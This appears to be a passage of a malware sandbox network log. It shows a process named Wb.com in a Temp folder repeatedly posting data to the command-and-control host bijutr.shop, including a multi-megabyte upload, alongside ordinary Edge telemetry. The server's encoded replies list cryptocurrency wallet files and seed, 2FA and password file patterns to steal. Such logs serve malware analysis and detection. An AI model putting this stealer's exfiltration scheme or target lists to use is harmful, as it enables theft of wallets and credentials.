                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-23 16:15:12 UTC | 955 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:11 GMT
                                                                                                                                                                                                                                                                                                      Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                      Location: /b2?rn=1734970511307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=264DEDAF8CF36A9502DCF8F18D816BBC&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                      set-cookie: UID=11521cea2404b69b6674da71734970511; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                      set-cookie: XID=11521cea2404b69b6674da71734970511; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                      Via: 1.1 a1498dff3937a5cd56baf5f0f59e01c2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: MRS52-P5
                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: ojqC5J4fzm0RXhf0IipaiD1bLza-EvsMe_TYSuVV28ZcIJr3H8rRRQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 49970 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:12 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----S0HVS2V3W4E3EUK6P89R
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 131557
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------S0HVS2V3W4E3EUK6P89RContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------S0HVS2V3W4E3EUK6P89RContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------S0HVS2V3W4E3EUK6P89RCont
2024-12-23 16:15:13 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:13 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
2024-12-23 16:15:13 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 49973 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:13 UTC | 327 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----SJECBASJEKF37QIEU37Q
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 6990993
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 4a 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------SJECBASJEKF37QIEU37QContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------SJECBASJEKF37QIEU37QContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------SJECBASJEKF37QIEU37QCont
2024-12-23 16:15:21 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:20 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 49974 | 51.104.15.253 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:13 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734970511304&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 3822
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      Cookie: _C_ETH=1; USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC3822OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 31 36 3a 31 35 3a 31 31 2e 32 39 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 39 64 63 61 30 33 39 2d 38 34 37 38 2d 34 31 37 31 2d 62 36 33 34 2d 38 39 61 64 62 61 37 37 36 33 64 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 32 33 34 31 31 36 38 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-23T16:15:11.299Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"b9dca039-8478-4171-b634-89adba7763d2","epoch":"2234116809"},"app":{"locale
2024-12-23 16:15:14 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=fdfba0ae671e488f98c6ad931ec123c4&HASH=fdfb&LV=202412&V=4&LU=1734970514020; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 16:15:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=1bdc9be1cb6b4a33811f812ae16aba27; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 16:45:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      time-delta-millis: 2716
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:14 GMT
                                                                                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 49977 | 108.139.47.50 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:14 UTC | 1012 | OUT | GET /b2?rn=1734970511307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=264DEDAF8CF36A9502DCF8F18D816BBC&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      Cookie: UID=11521cea2404b69b6674da71734970511; XID=11521cea2404b69b6674da71734970511
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:14 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:14 GMT
                                                                                                                                                                                                                                                                                                      Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                      Via: 1.1 fa46ec88710e6374e08eeaa473342090.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: Brz9vQVc8JyaIBDfUnPEoCtSWmAk8RRZP94LYBefZuPqBg4uErCEcw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 49987 | 20.110.205.119 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:14 UTC | 1261 | OUT | GET /c.gif?rnd=1734970511306&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=07175bb318f0456c974d87721f0f67b4&activityId=07175bb318f0456c974d87721f0f67b4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=6E60CE8AF10C41EC8044A9E776F1DAF3&MUID=264DEDAF8CF36A9502DCF8F18D816BBC HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; SM=T
2024-12-23 16:15:15 UTC | 982 | IN | HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: image/gif
Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
Accept-Ranges: bytes
ETag: "9270eb7934bdb1:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
Set-Cookie: MUID=264DEDAF8CF36A9502DCF8F18D816BBC; domain=.msn.com; expires=Sat, 17-Jan-2026 16:15:15 GMT; path=/; SameSite=None; Secure; Priority=High;
Set-Cookie: SRM_M=264DEDAF8CF36A9502DCF8F18D816BBC; domain=c.msn.com; expires=Sat, 17-Jan-2026 16:15:15 GMT; path=/; SameSite=None; Secure;
Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 30-Dec-2024 16:15:15 GMT; path=/; SameSite=None; Secure;
Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 23-Dec-2024 16:25:15 GMT; path=/; SameSite=None; Secure;
Date: Mon, 23 Dec 2024 16:15:14 GMT
Connection: close
Content-Length: 42
2024-12-23 16:15:15 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.6 | 49994 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:15 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IW479RIW47G4E3W4EU37
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:15:15 UTC | 331 | OUT | Data Ascii: ------IW479RIW47G4E3W4EU37Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------IW479RIW47G4E3W4EU37Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------IW479RIW47G4E3W4EU37Cont
2024-12-23 16:15:16 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:15:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 16:15:16 UTC | 2228 | IN | Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.6 | 50004 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:17 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EUSR9ZUKXLNYMY589HL6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:15:17 UTC | 331 | OUT |
                                                                                                                                                                                                                                                                                                      Data Ascii: ------EUSR9ZUKXLNYMY589HL6Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------EUSR9ZUKXLNYMY589HL6Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------EUSR9ZUKXLNYMY589HL6Cont
2024-12-23 16:15:18 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:18 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
2024-12-23 16:15:18 UTC | 1524 | IN |
                                                                                                                                                                                                                                                                                                      Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.6 | 50009 | 51.104.15.253 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:19 UTC | 1071 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734970517172&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 11908
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-23 16:15:19 UTC | 11908 | OUT |
                                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T16:15:17.170Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"b9dca039-8478-4171-b634-89adba7763d2","epoch":"2234116809"},"app":{"locale
2024-12-23 16:15:20 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=072083bfeb5f48c38edf2818a6bd2e0c&HASH=0720&LV=202412&V=4&LU=1734970519532; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 16:15:19 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=db014e7c040449e9a2123a48881ff514; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 16:45:19 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      time-delta-millis: 2360
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:19 GMT
                                                                                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.6 | 50008 | 51.104.15.253 | 443 | 7132 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:19 UTC | 1070 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734970517176&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 5173
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
